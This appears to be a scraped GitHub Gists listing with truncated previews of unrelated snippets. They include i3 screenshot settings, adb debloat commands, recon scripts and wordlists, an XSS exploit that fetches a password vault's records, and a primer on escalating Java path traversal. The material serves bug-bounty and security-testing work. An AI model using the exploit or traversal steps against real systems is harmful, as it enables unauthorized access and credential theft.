- maim
- xclip
Set this on your i3 config file ~/.i3/config
# Screenshots
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| adb devices | |
| adb shell | |
| # enter shell prompt | |
| pm uninstall -k --user 0 com.google.android.googlequicksearchbox | |
| pm uninstall -k --user 0 com.xiaomi.mipicks | |
| pm uninstall -k --user 0 com.android.browser |
shawarkhanethicalhacker
/ password_vault_exploit.js
Created
August 20, 2018 07:26
XSS Exploit code for retrieving passwords stored in a Password Vault
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Exploit Code by Shawar Khan | |
| var data_chunks = ''; | |
| // Capturing Records from API | |
| fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
| // Holds the records in as String | |
| var allrecords = data; | |
| // converting response to JSON |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import urllib.request, json, sys, textwrap | |
| # Run like | |
| # python3 pubsploit.py CVE-2017-0143 | |
| def cveSearch(cve): | |
| with urllib.request.urlopen('http://cve.circl.lu/api/cve/'+cve) as url: | |
| data = json.loads(url.read().decode()) | |
| try: | |
| if data['cvss']: | |
| print("{} | CVSS {}".format(cve,data['cvss'])) |
nullenc0de
/ content_discovery_nullenc0de.txt
Last active
April 2, 2025 06:37
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| / | |
| $$$lang-translate.service.js.aspx | |
| $367-Million-Merger-Blocked.html | |
| $defaultnav | |
| ${idfwbonavigation}.xml | |
| $_news.php | |
| $search2 | |
| £º | |
| .0 | |
| /0 |
dianjuar
/ i3-shortcuts-screenshot.md
Last active
September 2, 2025 22:03
My i3 shortcuts to take screenshots
kmcquade
/ AWS API calls that return credentials.md
Last active
September 9, 2025 22:40
AWS API calls that return credentials
dwisiswant0
/ st8out.sh
Last active
February 17, 2024 16:48
St8out - Extra one-liner for reconnaissance
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ##### | |
| # | |
| # St8out - Extra one-liner for reconnaissance | |
| # | |
| # Usage: ./st8out.sh target.com | |
| # | |
| # Resources: | |
| # - https://github.com/j3ssie/metabigor |
payloadartist
/ firefox.sh
Last active
February 6, 2021 20:42
Enumerate sub-domains, then open them in Firefox automatically. Useful for taking a quick glance at target's assets, and make notes, while doing recon.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ------Instructions--------- | |
| # Install (and configure) subfinder, assetfinder, and httprobe | |
| # go get -v github.com/projectdiscovery/subfinder/cmd/subfinder && go get -v github.com/tomnomnom/httprobe && go get -v github.com/tomnomnom/assetfinder | |
| # cat firefox.sh >> ~/.bashrc | |
| # source ~/.bashrc | |
| # Usage - subf_ff target.tld | |
| # asset_ff target.tld | |
| subf_ff () { | |
| subfinder -d $1 -silent -t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done |
harisec
/ exploit_path_traversals_in_Java_webapps.txt
Created
April 27, 2020 10:24
quick primer on how to exploit path traversals in Java web apps (i.e. you can read WEB-INF/web.xml)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| so, you can read WEB-INF/web.xml. how can you escalate this issue? | |
| [step 1]. try to read other common Java files such as WEB-INF/web-jetty.xml. | |
| use a specialized wordlist such as the following (from Sergey Bobrov/BlackFan): | |
| https://github.com/BlackFan/WEB-INF-dict/blob/master/web-inf.txt | |
| with time you can build your own wordlist adding files you've discovered over time. | |
| use Burp Intruder for this, it's perfect for this job. | |
| sort Intruder results by status code so you can see instantly which files were found. |
cmd@fb:/tmp|❯ wc -l 33m-subdomain-wordlist.txt
33927885 33m-subdomain-wordlist.txt